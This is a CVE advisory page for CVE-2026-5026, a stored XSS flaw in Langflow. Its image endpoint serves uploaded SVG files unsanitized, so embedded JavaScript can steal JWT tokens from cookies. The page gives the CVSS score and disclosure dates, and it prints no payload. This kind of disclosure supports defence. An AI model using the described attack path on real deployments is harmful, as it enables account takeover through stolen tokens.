CVE-2026-5026 HIGH

CVE-2026-5026: Langflow - Stored XSS via Malicious SVG Upload

Vendor Langflow-Ai
Product langflow
Weakness CWE-79 · XSS
Published March 27, 2026
Last update March 27, 2026

CVSS base score

7.0/10
Attack vector Network
Attack complexity Low
Privileges required Low
User interaction
Confidentiality
Integrity

CVSS vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

What the vulnerability does

01Description

The '/api/v1/files/images/{flow_id}/{file_name}' endpoint serves SVG files with the 'image/svg+xml' content type without sanitizing their content. Since SVG files can contain embedded JavaScript, an attacker can upload a malicious SVG that executes arbitrary JavaScript when viewed by other users, leading to stored cross-site scripting (XSS). This allows stealing authentication tokens stored in cookies, including JWT access and refresh tokens.

Key dates

02Disclosure timeline

March 27, 2026 CVE published
March 27, 2026 Record updated